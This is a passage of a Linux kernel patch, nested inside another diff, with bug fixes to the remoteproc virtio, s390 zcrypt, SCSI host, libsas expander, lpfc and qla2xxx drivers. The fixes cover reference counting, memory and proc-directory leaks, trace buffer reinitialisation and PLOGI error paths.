+@@ -584,9 +587,6 @@ static int rproc_virtio_remove(struct platform_device *pdev)
+ 	rproc_remove_subdev(rproc, &rvdev->subdev);
+ 	rproc_remove_rvdev(rvdev);
+ 
+-	of_reserved_mem_device_release(&pdev->dev);
+-	dma_release_coherent_memory(&pdev->dev);
+-
+ 	put_device(&rproc->dev);
+ 
+ 	return 0;
+diff --git a/drivers/s390/crypto/zcrypt_api.c b/drivers/s390/crypto/zcrypt_api.c
+index 28e34d155334b..6f44963d34bbf 100644
+--- a/drivers/s390/crypto/zcrypt_api.c
++++ b/drivers/s390/crypto/zcrypt_api.c
+@@ -617,6 +617,7 @@ static inline struct zcrypt_queue *zcrypt_pick_queue(struct zcrypt_card *zc,
+ {
+ 	if (!zq || !try_module_get(zq->queue->ap_dev.device.driver->owner))
+ 		return NULL;
++	zcrypt_card_get(zc);
+ 	zcrypt_queue_get(zq);
+ 	get_device(&zq->queue->ap_dev.device);
+ 	atomic_add(weight, &zc->load);
+@@ -636,6 +637,7 @@ static inline void zcrypt_drop_queue(struct zcrypt_card *zc,
+ 	atomic_sub(weight, &zq->load);
+ 	put_device(&zq->queue->ap_dev.device);
+ 	zcrypt_queue_put(zq);
++	zcrypt_card_put(zc);
+ 	module_put(mod);
+ }
+ 
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 8b825364baade..c785493b105c0 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -353,12 +353,13 @@ static void scsi_host_dev_release(struct device *dev)
+ 
+ 	if (shost->shost_state == SHOST_CREATED) {
+ 		/*
+-		 * Free the shost_dev device name here if scsi_host_alloc()
+-		 * and scsi_host_put() have been called but neither
++		 * Free the shost_dev device name and remove the proc host dir
++		 * here if scsi_host_{alloc,put}() have been called but neither
+ 		 * scsi_host_add() nor scsi_host_remove() has been called.
+ 		 * This avoids that the memory allocated for the shost_dev
+-		 * name is leaked.
++		 * name as well as the proc dir structure are leaked.
+ 		 */
++		scsi_proc_hostdir_rm(shost->hostt);
+ 		kfree(dev_name(&shost->shost_dev));
+ 	}
+ 
+diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
+index 63a23251fb1d8..4b5ceba68e46e 100644
+--- a/drivers/scsi/libsas/sas_expander.c
++++ b/drivers/scsi/libsas/sas_expander.c
+@@ -1651,6 +1651,16 @@ int sas_discover_root_expander(struct domain_device *dev)
+ 
+ /* ---------- Domain revalidation ---------- */
+ 
++static void sas_get_sas_addr_and_dev_type(struct smp_disc_resp *disc_resp,
++					  u8 *sas_addr,
++					  enum sas_device_type *type)
++{
++	memcpy(sas_addr, disc_resp->disc.attached_sas_addr, SAS_ADDR_SIZE);
++	*type = to_dev_type(&disc_resp->disc);
++	if (*type == SAS_PHY_UNUSED)
++		memset(sas_addr, 0, SAS_ADDR_SIZE);
++}
++
+ static int sas_get_phy_discover(struct domain_device *dev,
+ 				int phy_id, struct smp_disc_resp *disc_resp)
+ {
+@@ -1704,13 +1714,8 @@ int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
+ 		return -ENOMEM;
+ 
+ 	res = sas_get_phy_discover(dev, phy_id, disc_resp);
+-	if (res == 0) {
+-		memcpy(sas_addr, disc_resp->disc.attached_sas_addr,
+-		       SAS_ADDR_SIZE);
+-		*type = to_dev_type(&disc_resp->disc);
+-		if (*type == 0)
+-			memset(sas_addr, 0, SAS_ADDR_SIZE);
+-	}
++	if (res == 0)
++		sas_get_sas_addr_and_dev_type(disc_resp, sas_addr, type);
+ 	kfree(disc_resp);
+ 	return res;
+ }
+@@ -1972,6 +1977,7 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 	struct expander_device *ex = &dev->ex_dev;
+ 	struct ex_phy *phy = &ex->ex_phy[phy_id];
+ 	enum sas_device_type type = SAS_PHY_UNUSED;
++	struct smp_disc_resp *disc_resp;
+ 	u8 sas_addr[SAS_ADDR_SIZE];
+ 	char msg[80] = "";
+ 	int res;
+@@ -1983,33 +1989,41 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 		 SAS_ADDR(dev->sas_addr), phy_id, msg);
+ 
+ 	memset(sas_addr, 0, SAS_ADDR_SIZE);
+-	res = sas_get_phy_attached_dev(dev, phy_id, sas_addr, &type);
++	disc_resp = alloc_smp_resp(DISCOVER_RESP_SIZE);
++	if (!disc_resp)
++		return -ENOMEM;
++
++	res = sas_get_phy_discover(dev, phy_id, disc_resp);
+ 	switch (res) {
+ 	case SMP_RESP_NO_PHY:
+ 		phy->phy_state = PHY_NOT_PRESENT;
+ 		sas_unregister_devs_sas_addr(dev, phy_id, last);
+-		return res;
++		goto out_free_resp;
+ 	case SMP_RESP_PHY_VACANT:
+ 		phy->phy_state = PHY_VACANT;
+ 		sas_unregister_devs_sas_addr(dev, phy_id, last);
+-		return res;
++		goto out_free_resp;
+ 	case SMP_RESP_FUNC_ACC:
+ 		break;
+ 	case -ECOMM:
+ 		break;
+ 	default:
+-		return res;
++		goto out_free_resp;
+ 	}
+ 
++	if (res == 0)
++		sas_get_sas_addr_and_dev_type(disc_resp, sas_addr, &type);
++
+ 	if ((SAS_ADDR(sas_addr) == 0) || (res == -ECOMM)) {
+ 		phy->phy_state = PHY_EMPTY;
+ 		sas_unregister_devs_sas_addr(dev, phy_id, last);
+ 		/*
+-		 * Even though the PHY is empty, for convenience we discover
+-		 * the PHY to update the PHY info, like negotiated linkrate.
++		 * Even though the PHY is empty, for convenience we update
++		 * the PHY info, like negotiated linkrate.
+ 		 */
+-		sas_ex_phy_discover(dev, phy_id);
+-		return res;
++		if (res == 0)
++			sas_set_ex_phy(dev, phy_id, disc_resp);
++		goto out_free_resp;
+ 	} else if (SAS_ADDR(sas_addr) == SAS_ADDR(phy->attached_sas_addr) &&
+ 		   dev_type_flutter(type, phy->attached_dev_type)) {
+ 		struct domain_device *ata_dev = sas_ex_to_ata(dev, phy_id);
+@@ -2021,7 +2035,7 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 			action = ", needs recovery";
+ 		pr_debug("ex %016llx phy%02d broadcast flutter%s\n",
+ 			 SAS_ADDR(dev->sas_addr), phy_id, action);
+-		return res;
++		goto out_free_resp;
+ 	}
+ 
+ 	/* we always have to delete the old device when we went here */
+@@ -2030,7 +2044,10 @@ static int sas_rediscover_dev(struct domain_device *dev, int phy_id,
+ 		SAS_ADDR(phy->attached_sas_addr));
+ 	sas_unregister_devs_sas_addr(dev, phy_id, last);
+ 
+-	return sas_discover_new(dev, phy_id);
++	res = sas_discover_new(dev, phy_id);
++out_free_resp:
++	kfree(disc_resp);
++	return res;
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_bsg.c b/drivers/scsi/lpfc/lpfc_bsg.c
+index b54fafb486e06..2373dad016033 100644
+--- a/drivers/scsi/lpfc/lpfc_bsg.c
++++ b/drivers/scsi/lpfc/lpfc_bsg.c
+@@ -3169,10 +3169,10 @@ lpfc_bsg_diag_loopback_run(struct bsg_job *job)
+ 	}
+ 
+ 	cmdwqe = &cmdiocbq->wqe;
+-	memset(cmdwqe, 0, sizeof(union lpfc_wqe));
++	memset(cmdwqe, 0, sizeof(*cmdwqe));
+ 	if (phba->sli_rev < LPFC_SLI_REV4) {
+ 		rspwqe = &rspiocbq->wqe;
+-		memset(rspwqe, 0, sizeof(union lpfc_wqe));
++		memset(rspwqe, 0, sizeof(*rspwqe));
+ 	}
+ 
+ 	INIT_LIST_HEAD(&head);
+diff --git a/drivers/scsi/lpfc/lpfc_nvmet.c b/drivers/scsi/lpfc/lpfc_nvmet.c
+index f7cfac0da9b6e..1c64da3b2e9f0 100644
+--- a/drivers/scsi/lpfc/lpfc_nvmet.c
++++ b/drivers/scsi/lpfc/lpfc_nvmet.c
+@@ -1586,7 +1586,7 @@ lpfc_nvmet_setup_io_context(struct lpfc_hba *phba)
+ 		wqe = &nvmewqe->wqe;
+ 
+ 		/* Initialize WQE */
+-		memset(wqe, 0, sizeof(union lpfc_wqe));
++		memset(wqe, 0, sizeof(*wqe));
+ 
+ 		ctx_buf->iocbq->cmd_dmabuf = NULL;
+ 		spin_lock(&phba->sli4_hba.sgl_list_lock);
+diff --git a/drivers/scsi/qla2xxx/qla_attr.c b/drivers/scsi/qla2xxx/qla_attr.c
+index 07fbaa452d8a1..0d414c1aa84e7 100644
+--- a/drivers/scsi/qla2xxx/qla_attr.c
++++ b/drivers/scsi/qla2xxx/qla_attr.c
+@@ -2741,7 +2741,13 @@ qla2x00_dev_loss_tmo_callbk(struct fc_rport *rport)
+ 		return;
+ 
+ 	if (unlikely(pci_channel_offline(fcport->vha->hw->pdev))) {
+-		qla2x00_abort_all_cmds(fcport->vha, DID_NO_CONNECT << 16);
++		/* Will wait for wind down of adapter */
++		ql_dbg(ql_dbg_aer, fcport->vha, 0x900c,
++		    "%s pci offline detected (id %06x)\n", __func__,
++		    fcport->d_id.b24);
++		qla_pci_set_eeh_busy(fcport->vha);
++		qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24,
++		    0, WAIT_TARGET);
+ 		return;
+ 	}
+ }
+@@ -2763,7 +2769,11 @@ qla2x00_terminate_rport_io(struct fc_rport *rport)
+ 	vha = fcport->vha;
+ 
+ 	if (unlikely(pci_channel_offline(fcport->vha->hw->pdev))) {
+-		qla2x00_abort_all_cmds(fcport->vha, DID_NO_CONNECT << 16);
++		/* Will wait for wind down of adapter */
++		ql_dbg(ql_dbg_aer, fcport->vha, 0x900b,
++		    "%s pci offline detected (id %06x)\n", __func__,
++		    fcport->d_id.b24);
++		qla_pci_set_eeh_busy(vha);
+ 		qla2x00_eh_wait_for_pending_commands(fcport->vha, fcport->d_id.b24,
+ 			0, WAIT_TARGET);
+ 		return;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 1713588f671f3..31c451daeeb82 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -83,7 +83,7 @@ typedef union {
+ #include "qla_nvme.h"
+ #define QLA2XXX_DRIVER_NAME	"qla2xxx"
+ #define QLA2XXX_APIDEV		"ql2xapidev"
+-#define QLA2XXX_MANUFACTURER	"Marvell Semiconductor, Inc."
++#define QLA2XXX_MANUFACTURER	"Marvell"
+ 
+ /*
+  * We have MAILBOX_REGISTER_COUNT sized arrays in a few places,
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index 2e4537f9e5b50..73cd869caf609 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -44,7 +44,7 @@ extern int qla2x00_fabric_login(scsi_qla_host_t *, fc_port_t *, uint16_t *);
+ extern int qla2x00_local_device_login(scsi_qla_host_t *, fc_port_t *);
+ 
+ extern int qla24xx_els_dcmd_iocb(scsi_qla_host_t *, int, port_id_t);
+-extern int qla24xx_els_dcmd2_iocb(scsi_qla_host_t *, int, fc_port_t *, bool);
++extern int qla24xx_els_dcmd2_iocb(scsi_qla_host_t *, int, fc_port_t *);
+ extern void qla2x00_els_dcmd2_free(scsi_qla_host_t *vha,
+ 				   struct els_plogi *els_plogi);
+ 
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 884ed77259f85..c64e44964d840 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1187,8 +1187,12 @@ int qla24xx_async_gnl(struct scsi_qla_host *vha, fc_port_t *fcport)
+ 	return rval;
+ 
+ done_free_sp:
+-	/* ref: INIT */
+-	kref_put(&sp->cmd_kref, qla2x00_sp_release);
++	/*
++	 * use qla24xx_async_gnl_sp_done to purge all pending gnl request.
++	 * kref_put is call behind the scene.
++	 */
++	sp->u.iocb_cmd.u.mbx.in_mb[0] = MBS_COMMAND_ERROR;
++	qla24xx_async_gnl_sp_done(sp, QLA_COMMAND_ERROR);
+ 	fcport->flags &= ~(FCF_ASYNC_SENT);
+ done:
+ 	fcport->flags &= ~(FCF_ASYNC_ACTIVE);
+@@ -2666,6 +2670,40 @@ qla83xx_nic_core_fw_load(scsi_qla_host_t *vha)
+ 	return rval;
+ }
+ 
++static void qla_enable_fce_trace(scsi_qla_host_t *vha)
++{
++	int rval;
++	struct qla_hw_data *ha = vha->hw;
++
++	if (ha->fce) {
++		ha->flags.fce_enabled = 1;
++		memset(ha->fce, 0, fce_calc_size(ha->fce_bufs));
++		rval = qla2x00_enable_fce_trace(vha,
++		    ha->fce_dma, ha->fce_bufs, ha->fce_mb, &ha->fce_bufs);
++
++		if (rval) {
++			ql_log(ql_log_warn, vha, 0x8033,
++			    "Unable to reinitialize FCE (%d).\n", rval);
++			ha->flags.fce_enabled = 0;
++		}
++	}
++}
++
++static void qla_enable_eft_trace(scsi_qla_host_t *vha)
++{
++	int rval;
++	struct qla_hw_data *ha = vha->hw;
++
++	if (ha->eft) {
++		memset(ha->eft, 0, EFT_SIZE);
++		rval = qla2x00_enable_eft_trace(vha, ha->eft_dma, EFT_NUM_BUFFERS);
++
++		if (rval) {
++			ql_log(ql_log_warn, vha, 0x8034,
++			    "Unable to reinitialize EFT (%d).\n", rval);
++		}
++	}
++}
+ /*
+ * qla2x00_initialize_adapter
+ *      Initialize board.
+@@ -3669,9 +3707,8 @@ qla24xx_chip_diag(scsi_qla_host_t *vha)
+ }
+ 
+ static void
+-qla2x00_init_fce_trace(scsi_qla_host_t *vha)
++qla2x00_alloc_fce_trace(scsi_qla_host_t *vha)
+ {
+-	int rval;
+ 	dma_addr_t tc_dma;
+ 	void *tc;
+ 	struct qla_hw_data *ha = vha->hw;
+@@ -3700,27 +3737,17 @@ qla2x00_init_fce_trace(scsi_qla_host_t *vha)
+ 		return;
+ 	}
+ 
+-	rval = qla2x00_enable_fce_trace(vha, tc_dma, FCE_NUM_BUFFERS,
+-					ha->fce_mb, &ha->fce_bufs);
+-	if (rval) {
+-		ql_log(ql_log_warn, vha, 0x00bf,
+-		       "Unable to initialize FCE (%d).\n", rval);
+-		dma_free_coherent(&ha->pdev->dev, FCE_SIZE, tc, tc_dma);
+-		return;
+-	}
+-
+ 	ql_dbg(ql_dbg_init, vha, 0x00c0,
+ 	       "Allocated (%d KB) for FCE...\n", FCE_SIZE / 1024);
+ 
+-	ha->flags.fce_enabled = 1;
+ 	ha->fce_dma = tc_dma;
+ 	ha->fce = tc;
++	ha->fce_bufs = FCE_NUM_BUFFERS;
+ }
+ 
+ static void
+-qla2x00_init_eft_trace(scsi_qla_host_t *vha)
++qla2x00_alloc_eft_trace(scsi_qla_host_t *vha)
+ {
+-	int rval;
+ 	dma_addr_t tc_dma;
+ 	void *tc;
+ 	struct qla_hw_data *ha = vha->hw;
+@@ -3745,14 +3772,6 @@ qla2x00_init_eft_trace(scsi_qla_host_t *vha)
+ 		return;
+ 	}
+ 
+-	rval = qla2x00_enable_eft_trace(vha, tc_dma, EFT_NUM_BUFFERS);
+-	if (rval) {
+-		ql_log(ql_log_warn, vha, 0x00c2,
+-		       "Unable to initialize EFT (%d).\n", rval);
+-		dma_free_coherent(&ha->pdev->dev, EFT_SIZE, tc, tc_dma);
+-		return;
+-	}
+-
+ 	ql_dbg(ql_dbg_init, vha, 0x00c3,
+ 	       "Allocated (%d KB) EFT ...\n", EFT_SIZE / 1024);
+ 
+@@ -3760,13 +3779,6 @@ qla2x00_init_eft_trace(scsi_qla_host_t *vha)
+ 	ha->eft = tc;
+ }
+ 
+-static void
+-qla2x00_alloc_offload_mem(scsi_qla_host_t *vha)
+-{
+-	qla2x00_init_fce_trace(vha);
+-	qla2x00_init_eft_trace(vha);
+-}
+-
+ void
+ qla2x00_alloc_fw_dump(scsi_qla_host_t *vha)
+ {
+@@ -3821,10 +3833,10 @@ qla2x00_alloc_fw_dump(scsi_qla_host_t *vha)
+ 		if (ha->tgt.atio_ring)
+ 			mq_size += ha->tgt.atio_q_length * sizeof(request_t);
+ 
+-		qla2x00_init_fce_trace(vha);
++		qla2x00_alloc_fce_trace(vha);
+ 		if (ha->fce)
+ 			fce_size = sizeof(struct qla2xxx_fce_chain) + FCE_SIZE;
+-		qla2x00_init_eft_trace(vha);
++		qla2x00_alloc_eft_trace(vha);
+ 		if (ha->eft)
+ 			eft_size = EFT_SIZE;
+ 	}
+@@ -4254,7 +4266,6 @@ qla2x00_setup_chip(scsi_qla_host_t *vha)
+ 	struct qla_hw_data *ha = vha->hw;
+ 	struct device_reg_2xxx __iomem *reg = &ha->iobase->isp;
+ 	unsigned long flags;
+-	uint16_t fw_major_version;
+ 	int done_once = 0;
+ 
+ 	if (IS_P3P_TYPE(ha)) {
+@@ -4321,7 +4332,6 @@ qla2x00_setup_chip(scsi_qla_host_t *vha)
+ 					goto failed;
+ 
+ enable_82xx_npiv:
+-				fw_major_version = ha->fw_major_version;
+ 				if (IS_P3P_TYPE(ha))
+ 					qla82xx_check_md_needed(vha);
+ 				else
+@@ -4350,12 +4360,11 @@ qla2x00_setup_chip(scsi_qla_host_t *vha)
+ 				if (rval != QLA_SUCCESS)
+ 					goto failed;
+ 
+-				if (!fw_major_version && !(IS_P3P_TYPE(ha)))
+-					qla2x00_alloc_offload_mem(vha);
+-
+ 				if (ql2xallocfwdump && !(IS_P3P_TYPE(ha)))
+ 					qla2x00_alloc_fw_dump(vha);
+ 
++				qla_enable_fce_trace(vha);
++				qla_enable_eft_trace(vha);
+ 			} else {
+ 				goto failed;
+ 			}
+@@ -7540,12 +7549,12 @@ qla2x00_abort_isp_cleanup(scsi_qla_host_t *vha)
+ int
+ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ {
+-	int rval;
+ 	uint8_t        status = 0;
+ 	struct qla_hw_data *ha = vha->hw;
+ 	struct scsi_qla_host *vp, *tvp;
+ 	struct req_que *req = ha->req_q_map[0];
+ 	unsigned long flags;
++	fc_port_t *fcport;
+ 
+ 	if (vha->flags.online) {
+ 		qla2x00_abort_isp_cleanup(vha);
+@@ -7614,6 +7623,15 @@ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ 			       "ISP Abort - ISP reg disconnect post nvmram config, exiting.\n");
+ 			return status;
+ 		}
++
++		/* User may have updated [fcp|nvme] prefer in flash */
++		list_for_each_entry(fcport, &vha->vp_fcports, list) {
++			if (NVME_PRIORITY(ha, fcport))
++				fcport->do_prli_nvme = 1;
++			else
++				fcport->do_prli_nvme = 0;
++		}
++
+ 		if (!qla2x00_restart_isp(vha)) {
+ 			clear_bit(RESET_MARKER_NEEDED, &vha->dpc_flags);
+ 
+@@ -7634,31 +7652,7 @@ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ 
+ 			if (IS_QLA81XX(ha) || IS_QLA8031(ha))
+ 				qla2x00_get_fw_version(vha);
+-			if (ha->fce) {
+-				ha->flags.fce_enabled = 1;
+-				memset(ha->fce, 0,
+-				    fce_calc_size(ha->fce_bufs));
+-				rval = qla2x00_enable_fce_trace(vha,
+-				    ha->fce_dma, ha->fce_bufs, ha->fce_mb,
+-				    &ha->fce_bufs);
+-				if (rval) {
+-					ql_log(ql_log_warn, vha, 0x8033,
+-					    "Unable to reinitialize FCE "
+-					    "(%d).\n", rval);
+-					ha->flags.fce_enabled = 0;
+-				}
+-			}
+ 
+-			if (ha->eft) {
+-				memset(ha->eft, 0, EFT_SIZE);
+-				rval = qla2x00_enable_eft_trace(vha,
+-				    ha->eft_dma, EFT_NUM_BUFFERS);
+-				if (rval) {
+-					ql_log(ql_log_warn, vha, 0x8034,
+-					    "Unable to reinitialize EFT "
+-					    "(%d).\n", rval);
+-				}
+-			}
+ 		} else {	/* failed the ISP abort */
+ 			vha->flags.online = 1;
+ 			if (test_bit(ISP_ABORT_RETRY, &vha->dpc_flags)) {
+@@ -7708,6 +7702,14 @@ qla2x00_abort_isp(scsi_qla_host_t *vha)
+ 				atomic_inc(&vp->vref_count);
+ 				spin_unlock_irqrestore(&ha->vport_slock, flags);
+ 
++				/* User may have updated [fcp|nvme] prefer in flash */
++				list_for_each_entry(fcport, &vp->vp_fcports, list) {
++					if (NVME_PRIORITY(ha, fcport))
++						fcport->do_prli_nvme = 1;
++					else
++						fcport->do_prli_nvme = 0;
++				}
++
+ 				qla2x00_vp_abort_isp(vp);
+ 
+ 				spin_lock_irqsave(&ha->vport_slock, flags);
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 9e524d52dc862..7bccd525ee19b 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -2588,6 +2588,33 @@ void
+ qla2x00_sp_release(struct kref *kref)
+ {
+ 	struct srb *sp = container_of(kref, struct srb, cmd_kref);
++	struct scsi_qla_host *vha = sp->vha;
++
++	switch (sp->type) {
++	case SRB_CT_PTHRU_CMD:
++		/* GPSC & GFPNID use fcport->ct_desc.ct_sns for both req & rsp */
++		if (sp->u.iocb_cmd.u.ctarg.req &&
++			(!sp->fcport ||
++			 sp->u.iocb_cmd.u.ctarg.req != sp->fcport->ct_desc.ct_sns)) {
++			dma_free_coherent(&vha->hw->pdev->dev,
++			    sp->u.iocb_cmd.u.ctarg.req_allocated_size,
++			    sp->u.iocb_cmd.u.ctarg.req,
++			    sp->u.iocb_cmd.u.ctarg.req_dma);
++			sp->u.iocb_cmd.u.ctarg.req = NULL;
++		}
++		if (sp->u.iocb_cmd.u.ctarg.rsp &&
++			(!sp->fcport ||
++			 sp->u.iocb_cmd.u.ctarg.rsp != sp->fcport->ct_desc.ct_sns)) {
++			dma_free_coherent(&vha->hw->pdev->dev,
++			    sp->u.iocb_cmd.u.ctarg.rsp_allocated_size,
++			    sp->u.iocb_cmd.u.ctarg.rsp,
++			    sp->u.iocb_cmd.u.ctarg.rsp_dma);
++			sp->u.iocb_cmd.u.ctarg.rsp = NULL;
++		}
++		break;
++	default:
++		break;
++	}
+ 
+ 	sp->free(sp);
+ }
+@@ -2611,7 +2638,8 @@ static void qla2x00_els_dcmd_sp_free(srb_t *sp)
+ {
+ 	struct srb_iocb *elsio = &sp->u.iocb_cmd;
+ 
+-	kfree(sp->fcport);
++	if (sp->fcport)
++		qla2x00_free_fcport(sp->fcport);
+ 
+ 	if (elsio->u.els_logo.els_logo_pyld)
+ 		dma_free_coherent(&sp->vha->hw->pdev->dev, DMA_POOL_SIZE,
+@@ -2693,7 +2721,7 @@ qla24xx_els_dcmd_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	 */
+ 	sp = qla2x00_get_sp(vha, fcport, GFP_KERNEL);
+ 	if (!sp) {
+-		kfree(fcport);
++		qla2x00_free_fcport(fcport);
+ 		ql_log(ql_log_info, vha, 0x70e6,
+ 		 "SRB allocation failed\n");
+ 		return -ENOMEM;
+@@ -2724,6 +2752,7 @@ qla24xx_els_dcmd_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	if (!elsio->u.els_logo.els_logo_pyld) {
+ 		/* ref: INIT */
+ 		kref_put(&sp->cmd_kref, qla2x00_sp_release);
++		qla2x00_free_fcport(fcport);
+ 		return QLA_FUNCTION_FAILED;
+ 	}
+ 
+@@ -2748,6 +2777,7 @@ qla24xx_els_dcmd_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	if (rval != QLA_SUCCESS) {
+ 		/* ref: INIT */
+ 		kref_put(&sp->cmd_kref, qla2x00_sp_release);
++		qla2x00_free_fcport(fcport);
+ 		return QLA_FUNCTION_FAILED;
+ 	}
+ 
+@@ -3013,7 +3043,7 @@ static void qla2x00_els_dcmd2_sp_done(srb_t *sp, int res)
+ 
+ int
+ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+-    fc_port_t *fcport, bool wait)
++			fc_port_t *fcport)
+ {
+ 	srb_t *sp;
+ 	struct srb_iocb *elsio = NULL;
+@@ -3028,8 +3058,7 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	if (!sp) {
+ 		ql_log(ql_log_info, vha, 0x70e6,
+ 		 "SRB allocation failed\n");
+-		fcport->flags &= ~FCF_ASYNC_ACTIVE;
+-		return -ENOMEM;
++		goto done;
+ 	}
+ 
+ 	fcport->flags |= FCF_ASYNC_SENT;
+@@ -3038,9 +3067,6 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	ql_dbg(ql_dbg_io, vha, 0x3073,
+ 	       "%s Enter: PLOGI portid=%06x\n", __func__, fcport->d_id.b24);
+ 
+-	if (wait)
+-		sp->flags = SRB_WAKEUP_ON_COMP;
+-
+ 	sp->type = SRB_ELS_DCMD;
+ 	sp->name = "ELS_DCMD";
+ 	sp->fcport = fcport;
+@@ -3056,7 +3082,7 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 
+ 	if (!elsio->u.els_plogi.els_plogi_pyld) {
+ 		rval = QLA_FUNCTION_FAILED;
+-		goto out;
++		goto done_free_sp;
+ 	}
+ 
+ 	resp_ptr = elsio->u.els_plogi.els_resp_pyld =
+@@ -3065,7 +3091,7 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 
+ 	if (!elsio->u.els_plogi.els_resp_pyld) {
+ 		rval = QLA_FUNCTION_FAILED;
+-		goto out;
++		goto done_free_sp;
+ 	}
+ 
+ 	ql_dbg(ql_dbg_io, vha, 0x3073, "PLOGI %p %p\n", ptr, resp_ptr);
+@@ -3080,7 +3106,6 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 
+ 	if (els_opcode == ELS_DCMD_PLOGI && DBELL_ACTIVE(vha)) {
+ 		struct fc_els_flogi *p = ptr;
+-
+ 		p->fl_csp.sp_features |= cpu_to_be16(FC_SP_FT_SEC);
+ 	}
+ 
+@@ -3089,10 +3114,11 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 	    (uint8_t *)elsio->u.els_plogi.els_plogi_pyld,
+ 	    sizeof(*elsio->u.els_plogi.els_plogi_pyld));
+ 
+-	init_completion(&elsio->u.els_plogi.comp);
+ 	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS) {
+-		rval = QLA_FUNCTION_FAILED;
++		fcport->flags |= FCF_LOGIN_NEEDED;
++		set_bit(RELOGIN_NEEDED, &vha->dpc_flags);
++		goto done_free_sp;
+ 	} else {
+ 		ql_dbg(ql_dbg_disc, vha, 0x3074,
+ 		    "%s PLOGI sent, hdl=%x, loopid=%x, to port_id %06x from port_id %06x\n",
+@@ -3100,21 +3126,15 @@ qla24xx_els_dcmd2_iocb(scsi_qla_host_t *vha, int els_opcode,
+ 		    fcport->d_id.b24, vha->d_id.b24);
+ 	}
+ 
+-	if (wait) {
+-		wait_for_completion(&elsio->u.els_plogi.comp);
+-
+-		if (elsio->u.els_plogi.comp_status != CS_COMPLETE)
+-			rval = QLA_FUNCTION_FAILED;
+-	} else {
+-		goto done;
+-	}
++	return rval;
+ 
+-out:
+-	fcport->flags &= ~(FCF_ASYNC_SENT | FCF_ASYNC_ACTIVE);
++done_free_sp:
+ 	qla2x00_els_dcmd2_free(vha, &elsio->u.els_plogi);
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+ done:
++	fcport->flags &= ~(FCF_ASYNC_SENT | FCF_ASYNC_ACTIVE);
++	qla2x00_set_fcport_disc_state(fcport, DSC_DELETED);
+ 	return rval;
+ }
+ 
+@@ -3916,7 +3936,7 @@ qla2x00_start_sp(srb_t *sp)
+ 		return -EAGAIN;
+ 	}
+ 
+-	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
++	pkt = qla2x00_alloc_iocbs_ready(sp->qpair, sp);
+ 	if (!pkt) {
+ 		rval = -EAGAIN;
+ 		ql_log(ql_log_warn, vha, 0x700c,
+diff --git a/drivers/scsi/qla2xxx/qla_mbx.c b/drivers/scsi/qla2xxx/qla_mbx.c
+index f794f4363a38c..1fd9485985f2e 100644
+--- a/drivers/scsi/qla2xxx/qla_mbx.c
++++ b/drivers/scsi/qla2xxx/qla_mbx.c
+@@ -194,7 +194,7 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 	if (ha->flags.purge_mbox || chip_reset != ha->chip_reset ||
+ 	    ha->flags.eeh_busy) {
+ 		ql_log(ql_log_warn, vha, 0xd035,
+-		       "Error detected: purge[%d] eeh[%d] cmd=0x%x, Exiting.\n",
++		       "Purge mbox: purge[%d] eeh[%d] cmd=0x%x, Exiting.\n",
+ 		       ha->flags.purge_mbox, ha->flags.eeh_busy, mcp->mb[0]);
+ 		rval = QLA_ABORTED;
+ 		goto premature_exit;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 25ca0544b9639..25d0c2bfdd742 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -5562,7 +5562,7 @@ qla2x00_do_work(struct scsi_qla_host *vha)
+ 			break;
+ 		case QLA_EVT_ELS_PLOGI:
+ 			qla24xx_els_dcmd2_iocb(vha, ELS_DCMD_PLOGI,
+-			    e->u.fcport.fcport, false);
++			    e->u.fcport.fcport);
+ 			break;
+ 		case QLA_EVT_SA_REPLACE:
+ 			rc = qla24xx_issue_sa_replace_iocb(vha, e);
+diff --git a/drivers/scsi/qla2xxx/qla_target.c b/drivers/scsi/qla2xxx/qla_target.c
